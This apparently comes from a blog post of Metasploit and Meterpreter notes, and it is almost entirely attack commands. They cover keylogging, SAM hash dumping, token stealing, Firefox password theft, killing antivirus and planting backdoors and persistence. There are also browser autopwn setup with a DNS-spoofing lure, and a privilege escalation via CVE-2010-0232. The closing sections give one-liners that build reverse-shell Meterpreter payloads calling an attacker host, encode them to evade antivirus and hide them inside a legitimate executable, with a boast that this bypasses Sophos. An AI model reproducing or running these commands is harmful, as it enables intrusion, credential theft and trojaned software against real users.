Meterpreter

Process:

1
2
3
4
getuid              hows user id
getpid              shows meterpreter process id
ps              ists running processes
migrate [ps]            migrates to given process (one that wont end/crash)

KeyLog: Ensure you are monitoring the correct session (Explorer.exe/WinLogin.exe)

1
2
3
4
idletime            shows how long machine has been idle for
keyscan_start           starts the key logger
keyscan_dump            outputs captured data
keyscan_stop            stops the keylogger

Channels: This allows you to do more than one thing at a time in meterpreter

1
2
3
4
5
6
execute -f cmd.exe -c       opens a new cmd.exe and creates a new channel for it
channel -l          lists the open channels
read [channel]          outputs data from channel
interact [channel]      allows you to jump into the channel
write [channel]         sends data to the channel
close [channel]         kills the channel

Session: Session0 is the local desktop. Session1+ are rdp sessions.

1
2
3
4
enumdesktops            shows currently open desktops such as winlogin etc
getdesktop          shows current desktop session meterpreter is in
setdesktop          changes to an already open desktop session
uictl disable keyboard      disables the keyboard of the desktop session

FileEdit: Ability to edit files atributes such as MACE

1
2
3
4
timestomp file.txt -c "30/12/1980 12:12:34" changes file stamp of file
timestomp file.txt -f sourcefile.txt        copys timestamp from sourcefile.txt
use priv            to load the priv extras
hashdump            to dump the SAM file :-)

Tokens: Incognito allows token stealing and other token functions

1
2
3
4
5
6
use incognito           loads the incognito into meterpreter
list_tokens -u          shows stealable tokens
impersonate_token       allows a token to be stolen
steal_token [psid]      allows ability to steal token of a process
rev2self            reverts to origional token
run post/windows/gather/cachedump   gets cached domain hashes

need to wget http://lab.mediaservice.net/code/cachedump.rb to framework3/modules/post/windows/gather

Sniffer: Allows promiscuos mode to be enabled ;-)

1
2
3
4
5
6
use sniffer         loads the sniffer functions
sniffer_interfaces      list interface 1,2,3,4,5,6,etc
sniffer_start [n]       starts the sniffer for the interface
sniffer_stats [n]       lists packets, time, etc..
sniffer_dump [n] file.pcap  dumps the capture locally
sniffer_stop            you guessed it ;-)

Meterpreter Scripts: These scripts perform various functions on the victim

1
2
3
4
5
6
7
8
9
10
run checkvm         checks if the target is a vm
run credscollect        dumps hashes and tokens to screen
run enum_firefox        dumps temp internet files from firefox - cookies, passwords, etc :-)
run get_application_list    shows installed applications
run killav          trys to stop all known AV progs
run get_local_subnets       enumerates local subnet info
run metsvc          creates a backdoor
run persistence         survices a reboot (without admin or system)
run schedulme -e file.exe -m 30 you'll need to man load the meterpreter.exe payload
run kitrap0d            allows priv escalation using CVE-2010-0232

web browser exploit

1
2
3
4
5
6
use auxilary/server/browser_autopwn
set LHOST [local_ip]
set SRVPORT 80
set URIPATH /
run
#now get the client to connect to you (use ettercap dns)

inbuilt sqlite db

1
2
3
4
5
6
7
db_driver sqlite3      starts the db using sqlite (file based)
db_connect job       creates a new db called job and connects to it
db_hosts                shows hosts
db_services           shows visible services
db_nmap -sS [target_ip]     performs nmap against target and stores in db
dn_import_nmap_xml        allows inport
db_autopwn -p -e -r -t         autoown from db vulns

Meterpreter Payload Backdoor

1
2
3
4
5
6
./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 X > clear.exe
./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -e x86/shikata_ga_nai -c 5 -t exe -o encoded.exe
sets the payload as meterpreter and then encodes it 5 times to bypass AV
./msfpayload windows/meterpreter/reverse_tcp LHOST=phillipshome.getmyip.com LPORT=4444 R | ./msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /share/spider.exe -e x86/shikata_ga_nai -c 5
#this fucker bypasses sophos :-)
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.120 LPORT=4444 E

One Liners

1
2
3
4
5
6
7
8
# One liner meterpreter reverse_tcp
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` LPORT=4444 X > /root/clear.exe

# One liner shikata encoded meterpreter reverse_tcp
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` LPORT=4444 R | /pentest/exploits/framework3/msfencode -e x86/shikata_ga_nai -c 5 -t exe -o /root/encoded.exe

# One liner encoded and hidden in windows exe meterpreter reverse_tcp
/pentest/exploits/framework3/msfpayload windows/meterpreter/reverse_tcp LHOST=`ifconfig  | grep 'inet addr:'| grep -v '127.0.0.1' | cut -d: -f2 | awk '{ print $1}'` LPORT=4444 R |/pentest/exploits/framework3/msfencode -t exe -x /mnt/hgfs/tools/exploits/spider.exe -k -o /root/spider.exe -e x86/shikata_ga_nai -c 5

3 Responses to Metasploit Notes

Leave a Reply